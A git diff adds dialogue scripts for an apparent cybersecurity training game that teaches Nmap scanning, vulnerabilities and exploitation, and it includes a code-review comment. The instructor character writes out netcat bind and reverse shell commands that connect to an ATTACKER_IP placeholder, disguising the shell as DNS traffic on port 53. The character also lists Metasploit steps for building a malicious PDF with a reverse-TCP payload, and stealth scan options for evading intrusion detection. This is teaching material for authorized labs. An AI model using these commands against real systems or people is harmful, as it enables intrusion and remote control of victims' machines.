+ + Reconnaissance Specialist: Each operating system makes slightly different choices in how it handles network packets. + + Reconnaissance Specialist: Nmap sends specially crafted packets to both open and closed ports, then analyzes the responses. + + Reconnaissance Specialist: It compares these responses to a database of OS fingerprints to make an educated guess about what's running. + + ~ instructor_rapport += 5 + ++ [How do I use OS detection?] + Reconnaissance Specialist: OS detection is simple to invoke: + + Reconnaissance Specialist: sudo nmap -O IP_ADDRESS + + Reconnaissance Specialist: You need sudo because OS detection requires sending raw packets. + + Reconnaissance Specialist: Nmap will report its best guess about the operating system, often with a confidence percentage. + + Reconnaissance Specialist: You can combine OS detection with version detection: sudo nmap -O -sV IP_ADDRESS + + ~ instructor_rapport += 5 + ++ [How accurate is OS detection?] + Reconnaissance Specialist: OS detection is usually quite accurate, especially for common operating systems. + + Reconnaissance Specialist: However, it can be confused by firewalls, virtualization, or network devices that modify packets. + + Reconnaissance Specialist: Nmap will report a confidence level and sometimes multiple possible matches. + + Reconnaissance Specialist: Like version detection, OS detection can be deceived by administrators who configure their systems to report false information, though this is uncommon. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== nmap_timing === +Reconnaissance Specialist: Nmap's timing and performance options let you control the speed and stealth of your scans. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: Nmap offers six timing templates from paranoid to insane: + +Reconnaissance Specialist: -T0 (paranoid): Extremely slow, sends one probe every 5 minutes. For IDS evasion. 
+ +Reconnaissance Specialist: -T1 (sneaky): Very slow, sends one probe every 15 seconds. + +Reconnaissance Specialist: -T2 (polite): Slower, less bandwidth intensive. Won't overwhelm targets. + +Reconnaissance Specialist: -T3 (normal): The default. Balanced speed and reliability. + +Reconnaissance Specialist: -T4 (aggressive): Faster, assumes a fast and reliable network. + +Reconnaissance Specialist: -T5 (insane): Very fast, may miss open ports or overwhelm networks. + ++ [When would I use paranoid or sneaky timing?] + Reconnaissance Specialist: These ultra-slow timing templates are for stealth - attempting to evade intrusion detection systems. + + Reconnaissance Specialist: For example: nmap -T0 IP_ADDRESS + + Reconnaissance Specialist: However, modern IDS systems will still detect these scans, they just take much longer. + + Reconnaissance Specialist: These templates are rarely used in practice because they're so slow. A full scan could take days! + + Reconnaissance Specialist: In authorized penetration tests, you usually don't need this level of stealth. + + ~ instructor_rapport += 5 + ++ [When should I use aggressive or insane timing?] + Reconnaissance Specialist: Aggressive (-T4) is good when scanning on fast, reliable networks where you want quicker results. + + Reconnaissance Specialist: Insane (-T5) is for very fast networks when you want the absolute fastest scan: nmap -T5 IP_ADDRESS + + Reconnaissance Specialist: However, be careful! Insane timing can miss open ports because it doesn't wait long enough for responses. + + Reconnaissance Specialist: It can also overwhelm slow network links or trigger rate limiting, causing you to miss results. + + Reconnaissance Specialist: Generally, stick with normal or aggressive timing unless you have a specific reason to change. + + ~ instructor_rapport += 5 + ++ [Can I customize timing beyond the templates?] + Reconnaissance Specialist: Yes! 
Nmap has many granular timing options like --max-retries, --host-timeout, --scan-delay, and more. + + Reconnaissance Specialist: The templates are just convenient presets. You can read about all the timing options in the man page under "TIMING AND PERFORMANCE." + + Reconnaissance Specialist: For most purposes, the templates are sufficient and easier to remember. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== nmap_output === +Reconnaissance Specialist: Nmap's output options let you save scan results for later analysis, reporting, or importing into other tools. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: Nmap supports several output formats: + +Reconnaissance Specialist: -oN filename (normal output): Saves output similar to what you see on screen. + +Reconnaissance Specialist: -oX filename (XML output): Saves structured XML, great for importing into other tools. + +Reconnaissance Specialist: -oG filename (grepable output): Simple columnar format, but deprecated. + +Reconnaissance Specialist: -oA basename (all formats): Saves all three formats with the same base filename. + ++ [When should I use XML output?] + Reconnaissance Specialist: XML output is the most versatile format: + + Reconnaissance Specialist: nmap -oX scan_results.xml IP_ADDRESS + + Reconnaissance Specialist: XML can be imported into vulnerability scanners, reporting tools, and custom scripts. + + Reconnaissance Specialist: Many security tools and frameworks can parse Nmap XML directly. + + Reconnaissance Specialist: You can also transform XML with tools like xsltproc to create HTML reports or other formats. + + ~ instructor_rapport += 5 + ++ [What about Nmap GUIs?] + Reconnaissance Specialist: Nmap has several graphical interfaces, most notably Zenmap (the official GUI). + + Reconnaissance Specialist: GUIs can help beginners construct commands and visualize results. 
+ + Reconnaissance Specialist: They're useful for saving scan profiles and comparing results from multiple scans. + + Reconnaissance Specialist: However, most experts prefer the command line for speed, scriptability, and remote access via SSH. + + Reconnaissance Specialist: Note that Kali Linux recently removed Zenmap because it was based on Python 2, but other alternatives exist. + + ~ instructor_rapport += 5 + ++ [Should I always save output?] + Reconnaissance Specialist: In professional penetration testing, absolutely! You need records of what you scanned and when. + + Reconnaissance Specialist: Scan results are evidence for your reports and help you track progress. + + Reconnaissance Specialist: They also protect you legally - if something goes wrong, you have proof of what you actually did. + + Reconnaissance Specialist: Get in the habit of using -oA to save all formats: nmap -oA scan_results IP_ADDRESS + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== commands_reference === +Reconnaissance Specialist: Let me provide a comprehensive commands reference for this lab. 
+ +~ instructor_rapport += 5 + +Reconnaissance Specialist: **Basic Network Information:** + +Reconnaissance Specialist: Show IP addresses: ip a (or ifconfig on older systems) + +Reconnaissance Specialist: Show just the IPs: hostname -I + +Reconnaissance Specialist: **Ping Commands:** + +Reconnaissance Specialist: Basic ping: ping DESTINATION + +Reconnaissance Specialist: Limited count: ping -c 3 DESTINATION + +Reconnaissance Specialist: With timeout: ping -c 1 -W 1 DESTINATION + ++ [Show me ping sweep script commands] + Reconnaissance Specialist: **Ping Sweep Script:** + + Reconnaissance Specialist: Create script: vi pingsweep.sh + + Reconnaissance Specialist: Make executable: chmod +x pingsweep.sh + + Reconnaissance Specialist: Run script: ./pingsweep.sh 10.0.0 + + Reconnaissance Specialist: (Replace 10.0.0 with your network's first three octets) + + ~ instructor_rapport += 3 + ++ [Show me Nmap host discovery commands] + Reconnaissance Specialist: **Nmap Host Discovery:** + + Reconnaissance Specialist: Ping sweep with echo request: nmap -sn -PE 10.0.0.1-254 + + Reconnaissance Specialist: Default host discovery: sudo nmap -sn 10.0.0.1-254 + + Reconnaissance Specialist: List scan (DNS only): nmap -sL 10.0.0.1-254 + + ~ instructor_rapport += 3 + ++ [Show me port checking commands] + Reconnaissance Specialist: **Manual Port Checking:** + + Reconnaissance Specialist: Using telnet: telnet IP_ADDRESS 80 + + Reconnaissance Specialist: Using netcat: nc IP_ADDRESS 80 + + Reconnaissance Specialist: Test TCP connection with bash: echo > /dev/tcp/IP_ADDRESS/PORT + + Reconnaissance Specialist: Check last command status: echo $? 
+ + Reconnaissance Specialist: (0 = success, non-zero = failure) + + ~ instructor_rapport += 3 + ++ [Show me port scanner script commands] + Reconnaissance Specialist: **Port Scanner Script:** + + Reconnaissance Specialist: Create script: vi portscanner.sh + + Reconnaissance Specialist: Make executable: chmod +x portscanner.sh + + Reconnaissance Specialist: Run script: ./portscanner.sh IP_ADDRESS + + Reconnaissance Specialist: View results: less IP_ADDRESS.open_ports + + ~ instructor_rapport += 3 + ++ [Show me Nmap scanning commands] + Reconnaissance Specialist: **Nmap Port Scanning:** + + Reconnaissance Specialist: Basic scan: nmap TARGET + + Reconnaissance Specialist: SYN scan: sudo nmap -sS TARGET + + Reconnaissance Specialist: Connect scan: nmap -sT TARGET + + Reconnaissance Specialist: UDP scan: sudo nmap -sU TARGET + + Reconnaissance Specialist: Specific ports: nmap -p 80,443 TARGET + + Reconnaissance Specialist: Port range: nmap -p 1-1000 TARGET + + Reconnaissance Specialist: All ports: nmap -p- TARGET + + Reconnaissance Specialist: Fast scan: nmap -F TARGET + + ~ instructor_rapport += 3 + ++ [Show me service detection commands] + Reconnaissance Specialist: **Service Identification:** + + Reconnaissance Specialist: Manual banner grab (FTP): nc IP_ADDRESS 21 + + Reconnaissance Specialist: Manual banner grab (HTTP): nc IP_ADDRESS 80 (then type . 
and press Enter) + + Reconnaissance Specialist: Automated banner grab: nc IP_ADDRESS 1-2000 -w 1 + + Reconnaissance Specialist: Amap protocol analysis: amap -A IP_ADDRESS PORT + + Reconnaissance Specialist: Nmap version detection: nmap -sV IP_ADDRESS + + Reconnaissance Specialist: Version detection on specific port: nmap -sV -p 80 IP_ADDRESS + + ~ instructor_rapport += 3 + ++ [Show me OS detection and timing commands] + Reconnaissance Specialist: **OS Detection:** + + Reconnaissance Specialist: OS detection: sudo nmap -O IP_ADDRESS + + Reconnaissance Specialist: OS + version detection: sudo nmap -O -sV IP_ADDRESS + + Reconnaissance Specialist: **Timing Templates:** + + Reconnaissance Specialist: Paranoid: nmap -T0 TARGET + + Reconnaissance Specialist: Sneaky: nmap -T1 TARGET + + Reconnaissance Specialist: Polite: nmap -T2 TARGET + + Reconnaissance Specialist: Normal (default): nmap -T3 TARGET + + Reconnaissance Specialist: Aggressive: nmap -T4 TARGET + + Reconnaissance Specialist: Insane: nmap -T5 TARGET + + ~ instructor_rapport += 3 + ++ [Show me output commands] + Reconnaissance Specialist: **Nmap Output:** + + Reconnaissance Specialist: Normal output: nmap -oN filename TARGET + + Reconnaissance Specialist: XML output: nmap -oX filename TARGET + + Reconnaissance Specialist: Grepable output: nmap -oG filename TARGET + + Reconnaissance Specialist: All formats: nmap -oA basename TARGET + + Reconnaissance Specialist: View output file: less filename + + ~ instructor_rapport += 3 + ++ [Show me combined scan examples] + Reconnaissance Specialist: **Combined Scans:** + + Reconnaissance Specialist: Fast aggressive scan with version detection: + + Reconnaissance Specialist: nmap -T4 -F -sV IP_ADDRESS + + Reconnaissance Specialist: Comprehensive scan all ports with OS and version detection: + + Reconnaissance Specialist: sudo nmap -T4 -p- -O -sV -oA comprehensive_scan IP_ADDRESS + + Reconnaissance Specialist: Stealth scan specific ports: + + Reconnaissance Specialist: sudo 
nmap -T2 -sS -p 80,443,8080 IP_ADDRESS + + ~ instructor_rapport += 3 + +- -> scanning_hub + +=== challenge_tips === +Reconnaissance Specialist: Let me give you some practical tips for succeeding in the scanning challenges. + +~ instructor_rapport += 5 + +Reconnaissance Specialist: **Finding Live Hosts:** + +Reconnaissance Specialist: Use Nmap's default ping sweep - it's more reliable than just ICMP echo: sudo nmap -sn NETWORK_RANGE + +Reconnaissance Specialist: Note all discovered IP addresses. Your Kali VM will be one of them, and your targets will be the others. + +Reconnaissance Specialist: The first three octets of all systems in the lab will match. + ++ [Tips for port scanning?] + Reconnaissance Specialist: Start with a default Nmap scan to find the most common open ports quickly: nmap IP_ADDRESS + + Reconnaissance Specialist: Then do a comprehensive scan of all ports to find hidden services: nmap -p- IP_ADDRESS + + Reconnaissance Specialist: Remember, there's often a service on an unusual high port that you'll miss if you only scan common ports! + + Reconnaissance Specialist: Use -T4 to speed things up on the lab network: nmap -T4 -p- IP_ADDRESS + + ~ instructor_rapport += 5 + ++ [Tips for banner grabbing?] + Reconnaissance Specialist: When banner grabbing with netcat, be patient. Some services send the banner immediately, others wait for you to send something first. + + Reconnaissance Specialist: For HTTP (port 80), type any character and press Enter to trigger a response. + + Reconnaissance Specialist: Look carefully at all the banner information - sometimes flags are encoded in the banners! + + Reconnaissance Specialist: The hint mentions a flag is encoded using a common method - think base64 or similar. + + ~ instructor_rapport += 5 + ++ [What about that familiar vulnerability?] + Reconnaissance Specialist: The instructions hint at "a familiar vulnerability" that you can exploit. 
+ + Reconnaissance Specialist: Think back to vulnerabilities you've seen in previous labs - Distcc perhaps? + + Reconnaissance Specialist: Make sure you scan ALL ports, not just the common ones, to find it. + + Reconnaissance Specialist: Once you find the vulnerable service, you know what to do from the previous lab! + + ~ instructor_rapport += 5 + ++ [General troubleshooting advice?] + Reconnaissance Specialist: If you're not finding expected results, double-check your network range. Use hostname -I on Kali to confirm. + + Reconnaissance Specialist: Make sure the victim VMs are actually running - check the Hacktivity dashboard. + + Reconnaissance Specialist: If scans seem to hang, try reducing the timing or checking your network connectivity. + + Reconnaissance Specialist: Remember that -p- (all ports) scans take time. Be patient or use -T4 to speed it up. + + Reconnaissance Specialist: Always use sudo for SYN scans, UDP scans, and OS detection - they require root privileges. + + ~ instructor_rapport += 5 + +- -> scanning_hub + +=== ready_for_practice === +Reconnaissance Specialist: Excellent! You're ready to start the practical scanning exercises. + +~ instructor_rapport += 10 +~ scanning_ethics += 10 + +Reconnaissance Specialist: Remember: this knowledge is powerful. Network scanning without authorization is illegal in most jurisdictions. + +Reconnaissance Specialist: You have permission to scan the lab VMs. Never scan external networks, your school network, or any systems you don't own without explicit written authorization. + +Reconnaissance Specialist: In professional penetration testing, you'll have a scope document that clearly defines what you're allowed to scan. + ++ [Any final advice?] + Reconnaissance Specialist: Start simple - find live hosts first, then scan common ports, then expand to all ports. + + Reconnaissance Specialist: Document everything you find. Take notes on IP addresses, open ports, and service versions. 
+ + Reconnaissance Specialist: Read the Nmap man page regularly - it's one of the best sources of information: man nmap + + Reconnaissance Specialist: Don't forget to look for those flags - in banners, on unusual ports, and via exploitation of familiar vulnerabilities! + + Reconnaissance Specialist: Most importantly: be patient and methodical. Scanning is about being thorough, not fast. + + ~ instructor_rapport += 10 + +- -> scanning_hub + +-> END diff --git a/story_design/ink/game_scenarios/vulnerabilities_exploits.ink b/story_design/ink/game_scenarios/vulnerabilities_exploits.ink new file mode 100644 index 0000000..2fe7450 --- /dev/null +++ b/story_design/ink/game_scenarios/vulnerabilities_exploits.ink 
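Review bot: In scanning.ink's commands_reference knot, the host-discovery line `Ping sweep with echo request: nmap -sn -PE 10.0.0.1-254` is missing `sudo`, while the very next line (`Default host discovery: sudo nmap -sn 10.0.0.1-254`) and the troubleshooting tip ("Always use sudo for SYN scans, UDP scans, and OS detection - they require root privileges") both tell the player that raw-packet probes need root; an unprivileged Nmap cannot send ICMP echo requests and warns that it is falling back to a TCP-based ping, so a learner following the sheet runs a different sweep from the one the text describes. Suggest `sudo nmap -sn -PE 10.0.0.1-254` and adding ICMP ping sweeps to that "Always use sudo" list. Two smaller points in the same hunk: in protocol_analysis the version-detection branch gives `nmap -sV IP_ADDRESS` twice (as the opening command and again as "scan all default ports with version detection"), so the second can go; and the HTTP banner-grab instructions disagree between service_identification ("type a dot and press Enter a few times") and challenge_tips ("type any character and press Enter"), which should be made consistent since the player is expected to follow them literally.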
@@ -0,0 +1,750 @@ +// Vulnerabilities, Exploits, and Remote Access Payloads Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/3_vulnerabilities.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR exploitation_ethics = 0 + +// External variables +EXTERNAL player_name + +=== start === +Penetration Testing Instructor: Welcome, Agent {player_name}. I'm your instructor for Vulnerabilities and Exploitation. + +~ instructor_rapport = 0 +~ exploitation_ethics = 0 + +Penetration Testing Instructor: This lab explores one of the most critical threats in cybersecurity: software vulnerabilities. Even systems running only "trusted" software from major vendors can be compromised due to programming mistakes. + +Penetration Testing Instructor: We'll explore how attackers exploit weaknesses in software systems, the difference between bind shells and reverse shells, and get hands-on with the Metasploit framework. + +Penetration Testing Instructor: Let me be clear: this knowledge is for authorized security testing, penetration testing engagements, and defensive purposes only. Understanding how attacks work is essential for defending against them. + +~ exploitation_ethics += 10 + +-> vulnerability_hub + +=== vulnerability_hub === +Penetration Testing Instructor: What aspect of vulnerabilities and exploitation would you like to explore? + ++ [What are software vulnerabilities?] + -> software_vulnerabilities_intro ++ [What causes software vulnerabilities?] + -> vulnerability_causes ++ [Exploits and payloads - what's the difference?] + -> exploits_payloads ++ [Types of payloads and shellcode] + -> shellcode_intro ++ [Bind shells - how do they work?] 
+ -> bind_shell_concept ++ [Reverse shells - the modern approach] + -> reverse_shell_concept ++ [Network Address Translation (NAT) considerations] + -> nat_considerations ++ [Introduction to Metasploit Framework] + -> metasploit_intro ++ [Using msfconsole - the interactive console] + -> msfconsole_basics ++ [Local exploits - attacking client applications] + -> local_exploits ++ [Remote exploits - attacking network services] + -> remote_exploits ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== software_vulnerabilities_intro === +Penetration Testing Instructor: Excellent question. A software vulnerability is a weakness in the security of a program. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: Think about it this way: what if an attacker wants to run malicious code on a system that only allows "trusted" software from companies like Microsoft or Adobe? + +Penetration Testing Instructor: Unfortunately, it turns out that writing secure code is quite hard. Innocent and seemingly small programming mistakes can cause serious security vulnerabilities. + +Penetration Testing Instructor: In many cases, software vulnerabilities can lead to attackers being able to take control of the vulnerable software. When an attacker can run any code they like, this is known as "arbitrary code execution." + ++ [What does arbitrary code execution allow an attacker to do?] + Penetration Testing Instructor: With arbitrary code execution, attackers can essentially assume the identity of the vulnerable software and misbehave. + + Penetration Testing Instructor: For example, if they compromise a web browser, they can access anything the browser can access - your files, your cookies, your session tokens. 
+ + Penetration Testing Instructor: If they compromise a system service running as administrator or root, they have complete control over the entire system. + + ~ instructor_rapport += 5 + ++ [Can you give me a real-world example?] + Penetration Testing Instructor: Sure. Adobe Reader versions before 8.1.2 had vulnerabilities that allowed attackers to craft malicious PDF documents. + + Penetration Testing Instructor: When a victim opened the PDF, the attacker could execute arbitrary code on their system - just by opening what appeared to be a normal document. + + Penetration Testing Instructor: Another example is the Distcc vulnerability (CVE-2004-2687). Anyone who could connect to the Distcc port could execute arbitrary commands on the server. + + ~ instructor_rapport += 5 + ++ [Tell me more about the causes] + -> vulnerability_causes + +- -> vulnerability_hub + +=== vulnerability_causes === +Penetration Testing Instructor: Software vulnerabilities arise from three main categories of mistakes. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: First, there are design flaws - fundamental mistakes in how the system was architected. These are problems with the concept itself, not just the implementation. + +Penetration Testing Instructor: Second, implementation flaws - mistakes in the programming code. This includes buffer overflows, SQL injection vulnerabilities, cross-site scripting flaws, and so on. + +Penetration Testing Instructor: Third, misconfiguration - mistakes in settings and configuration. Even secure software can be made vulnerable through poor configuration choices. + ++ [Which type is most common?] + Penetration Testing Instructor: Implementation flaws are incredibly common because programming secure code is difficult, especially in languages like C and C++ that don't have built-in protections. 
+ + Penetration Testing Instructor: However, misconfigurations are also extremely prevalent because systems are complex and it's easy to overlook security settings. + + Penetration Testing Instructor: Design flaws are less common but can be more fundamental and harder to fix without major rearchitecture. + + ~ instructor_rapport += 5 + ++ [Can these vulnerabilities be completely prevented?] + Penetration Testing Instructor: That's a great question that gets at a fundamental challenge in security. + + Penetration Testing Instructor: Complete prevention is nearly impossible in complex software. However, we can significantly reduce vulnerabilities through secure coding practices, code review, security testing, and using modern languages with built-in protections. + + Penetration Testing Instructor: This is why defense in depth is important - we assume vulnerabilities will exist and add layers of protection. + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== exploits_payloads === +Penetration Testing Instructor: Let me clarify these two important concepts. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: An exploit is an action - or a piece of software that performs an action - that takes advantage of a vulnerability. + +Penetration Testing Instructor: The result is that an attacker makes the system perform in ways that are not intentionally authorized. This could include arbitrary code execution, changes to databases, or denial of service like crashing the system. + +Penetration Testing Instructor: The action that takes place when an exploit is successful is known as the payload. + ++ [So the exploit is the delivery mechanism?] + Penetration Testing Instructor: Exactly! Think of it like this: the exploit is the lock pick, and the payload is what you do once you're inside. + + Penetration Testing Instructor: The exploit leverages the vulnerability to gain control, and the payload is the malicious code that runs once control is achieved. 
+ + Penetration Testing Instructor: In Metasploit, you can mix and match exploits with different payloads, giving tremendous flexibility. + + ~ instructor_rapport += 5 + ++ [What kinds of payloads are there?] + -> shellcode_intro + +- -> vulnerability_hub + +=== shellcode_intro === +Penetration Testing Instructor: The most common type of payload is shellcode - code that gives the attacker shell access to the target system. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: With shell access, attackers can interact with a command prompt and run commands on the target system as if they were sitting at the keyboard. + +Penetration Testing Instructor: Metasploit has hundreds of different payloads. You can list them with the msfvenom command: + +Penetration Testing Instructor: msfvenom -l payload | less + +Penetration Testing Instructor: There are two main approaches to achieving remote shell access: bind shells and reverse shells. + ++ [What's a bind shell?] + -> bind_shell_concept + ++ [What's a reverse shell?] + -> reverse_shell_concept + ++ [Which one should I use?] + Penetration Testing Instructor: In modern penetration testing, reverse shells are almost always the better choice. + + Penetration Testing Instructor: They bypass most firewall configurations and work even when the target is behind NAT. + + Penetration Testing Instructor: But let me explain both so you understand the trade-offs. + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== bind_shell_concept === +Penetration Testing Instructor: A bind shell is the simplest approach. The payload listens on the network for a connection, and serves up a shell to anything that connects. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: Think of it like this: the victim's computer opens a port and waits. The attacker then connects to that port and gets a command prompt. + +Penetration Testing Instructor: You can simulate this with netcat. 
On the victim system, run: + +Penetration Testing Instructor: nc.exe -l -p 31337 -e cmd.exe -vv + +Penetration Testing Instructor: Then from the attacker system, connect with: + +Penetration Testing Instructor: nc VICTIM_IP 31337 + ++ [What do those netcat flags mean?] + Penetration Testing Instructor: Good attention to detail! Let me break it down: + + Penetration Testing Instructor: The -l flag tells netcat to listen as a service rather than connect as a client. + + Penetration Testing Instructor: The -p flag specifies the port number to listen on. + + Penetration Testing Instructor: The -e flag executes the specified program (cmd.exe on Windows, /bin/bash on Linux) and pipes all interaction through the connection. + + Penetration Testing Instructor: The -vv flag makes it very verbose, showing you what's happening. + + ~ instructor_rapport += 5 + ++ [What's the main limitation of bind shells?] + Penetration Testing Instructor: Excellent question. Firewalls and NAT routing are the main problems. + + Penetration Testing Instructor: Nowadays, firewalls typically prevent incoming network connections unless there's a specific reason to allow them - like the system being a web server. + + Penetration Testing Instructor: If the victim is behind a NAT router or firewall that blocks incoming connections, your bind shell is useless. + + Penetration Testing Instructor: This is why reverse shells became the dominant approach. + + ~ instructor_rapport += 5 + ++ [Tell me about reverse shells instead] + -> reverse_shell_concept + +- -> vulnerability_hub + +=== reverse_shell_concept === +Penetration Testing Instructor: Reverse shells solve the firewall and NAT problems by reversing the connection direction. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: Instead of the attacker connecting to the victim, the victim connects to the attacker! 
+ +Penetration Testing Instructor: Here's how it works: the attacker starts listening on their system, then the payload on the victim's system initiates an outbound connection to the attacker. + +Penetration Testing Instructor: This works because firewalls typically allow outbound connections. They have to - otherwise you couldn't browse websites or check email. + ++ [How do you set up a reverse shell with netcat?] + Penetration Testing Instructor: On the attacker system (Kali), start listening: + + Penetration Testing Instructor: nc -l -p 53 -vv + + Penetration Testing Instructor: On the victim system, connect back: + + Penetration Testing Instructor: nc.exe ATTACKER_IP 53 -e cmd.exe -vv + + Penetration Testing Instructor: Notice the victim is making the connection, but you still get a shell on your attacker system. + + ~ instructor_rapport += 5 + ++ [Why use port 53 specifically?] + Penetration Testing Instructor: Brilliant observation! Port 53 is used by DNS - the Domain Name System that resolves domain names to IP addresses. + + Penetration Testing Instructor: Almost every Internet-connected system needs DNS to function. It's how "google.com" becomes an IP address. + + Penetration Testing Instructor: Because DNS is essential, it's extremely rare for firewalls to block outbound connections on port 53. + + Penetration Testing Instructor: By using port 53, we're disguising our reverse shell connection as DNS traffic, making it very likely to get through. + + ~ instructor_rapport += 5 + ++ [What about NAT and public IP addresses?] + -> nat_considerations + +- -> vulnerability_hub + +=== nat_considerations === +Penetration Testing Instructor: Network Address Translation adds another complication worth understanding. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: Often computer systems share one public IP address via a router, which then sends traffic to the correct local IP address using NAT. 
+ +Penetration Testing Instructor: Unless port forwarding is configured on the router, there's no way to connect directly to a system without a public IP address. + +Penetration Testing Instructor: This is another reason reverse shells are necessary - they can start connections from behind NAT to systems with public IPs. + ++ [So the attacker needs a public IP?] + Penetration Testing Instructor: For a reverse shell to work, yes - the attacker needs a publicly routable IP address, or port forwarding from one. + + Penetration Testing Instructor: This is why attackers often use VPS (Virtual Private Servers) or compromised servers as command and control infrastructure. + + Penetration Testing Instructor: In penetration testing engagements, you might work with the client's network team to set up proper port forwarding. + + ~ instructor_rapport += 5 + ++ [What if both systems are behind NAT?] + Penetration Testing Instructor: Then you'd need more advanced techniques like tunneling through a public server, or exploiting Universal Plug and Play (UPnP) to create port forwards. + + Penetration Testing Instructor: Some attack frameworks use domain generation algorithms or communicate through third-party services like social media APIs. + + Penetration Testing Instructor: But that's getting into advanced command and control techniques beyond this basic lab. + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== metasploit_intro === +Penetration Testing Instructor: The Metasploit Framework is one of the most powerful and comprehensive tools for exploitation and penetration testing. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: At its core, Metasploit provides a framework - a set of libraries and tools for exploit development and deployment. + +Penetration Testing Instructor: It includes modules for specific exploits, payloads, encoders, post-exploitation tools, and other extensions. 
+ +Penetration Testing Instructor: The framework has several interfaces you can use: msfconsole (the interactive text console), the web-based Metasploit Community/Pro editions, and Armitage (a graphical interface). + ++ [How many exploits does it include?] + Penetration Testing Instructor: Depending on the version and when it was last updated, Metasploit typically includes over two thousand different exploits! + + Penetration Testing Instructor: When you start msfconsole, it reports the exact number of exploit modules available. + + Penetration Testing Instructor: You can see them all with the "show exploits" command, though that list is quite long. + + ~ instructor_rapport += 5 + ++ [What's the typical workflow for using an exploit?] + Penetration Testing Instructor: Great question. Here's the standard process: + + Penetration Testing Instructor: First, specify the exploit to use. Second, set options for the exploit like the IP address to attack. Third, choose a payload - this defines what happens on the compromised system. + + Penetration Testing Instructor: Optionally, you can choose encoding to evade security monitoring like anti-malware or intrusion detection systems. + + Penetration Testing Instructor: Finally, launch the exploit and see if it succeeds. + + Penetration Testing Instructor: The flexibility to combine any exploit with different payloads and encoding is what makes Metasploit so powerful. + + ~ instructor_rapport += 5 + ++ [Tell me more about msfconsole] + -> msfconsole_basics + +- -> vulnerability_hub + +=== msfconsole_basics === +Penetration Testing Instructor: Msfconsole is the interactive console interface that many consider the preferred way to use Metasploit. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: Start it by simply running "msfconsole" - though it may take a moment to load. + +Penetration Testing Instructor: Once it's running, you have access to all of Metasploit's features through an interactive command line. 
+ ++ [What commands should I know?] + Penetration Testing Instructor: Let me give you the essentials: + + Penetration Testing Instructor: "help" shows all available commands. "show exploits" lists all exploit modules. "show payloads" lists available payloads. + + Penetration Testing Instructor: "use exploit/path/to/exploit" selects an exploit. "show options" displays what needs to be configured. + + Penetration Testing Instructor: "set OPTION_NAME value" configures an option. "exploit" or "run" launches the attack. + + Penetration Testing Instructor: "back" returns you to the main context if you want to change exploits. + + ~ instructor_rapport += 5 + ++ [Can I run regular shell commands too?] + Penetration Testing Instructor: Yes! You can run local programs directly from msfconsole, similar to a standard shell. + + Penetration Testing Instructor: For example, "ls /home/kali" works just fine from within msfconsole. + + Penetration Testing Instructor: This is convenient because you don't need to exit msfconsole to check files or run quick commands. + + ~ instructor_rapport += 5 + ++ [Does it have tab completion?] + Penetration Testing Instructor: Absolutely! Msfconsole has excellent tab completion support. + + Penetration Testing Instructor: You can press TAB while typing exploit paths, options, or commands to autocomplete them. + + Penetration Testing Instructor: You can also use UP and DOWN arrow keys to navigate through your command history. + + Penetration Testing Instructor: These features make it much faster to work with Metasploit. + + ~ instructor_rapport += 5 + +- -> vulnerability_hub + +=== local_exploits === +Penetration Testing Instructor: Local exploits target applications running on the victim's computer, rather than network services. + +~ instructor_rapport += 5 + +Penetration Testing Instructor: These often require some social engineering to get the victim to open a malicious file or visit a malicious website. 
+ +Penetration Testing Instructor: A classic example is the Adobe PDF Escape EXE vulnerability (CVE-2010-1240). This affected Adobe Reader versions before 8.1.2. + ++ [How does the PDF exploit work?] + Penetration Testing Instructor: You craft a malicious PDF document that exploits a vulnerability in how Adobe Reader processes embedded executables. + + Penetration Testing Instructor: When the victim opens the PDF, they're prompted to execute a payload with a message that encourages them to click "Open." + + Penetration Testing Instructor: If they click it, your payload executes on their system with their privileges. + + Penetration Testing Instructor: The Metasploit module is "exploit/windows/fileformat/adobe_pdf_embedded_exe" + + ~ instructor_rapport += 5 + ++ [Walk me through creating a malicious PDF] + Penetration Testing Instructor: Sure! In msfconsole, start with: + + Penetration Testing Instructor: use exploit/windows/fileformat/adobe_pdf_embedded_exe + + Penetration Testing Instructor: Then set the filename: set FILENAME timetable.pdf + + Penetration Testing Instructor: Choose a payload: set PAYLOAD windows/shell/reverse_tcp + + Penetration Testing Instructor: Configure where to connect back: set LHOST YOUR_IP and set LPORT YOUR_PORT + + Penetration Testing Instructor: Finally, run the exploit to generate the malicious PDF. + + Penetration Testing Instructor: To receive the reverse shell, you need to set up a handler before the victim opens the PDF. + + ~ instructor_rapport += 5 + ++ [How do I set up the handler to receive the connection?] + Penetration Testing Instructor: Good question! 
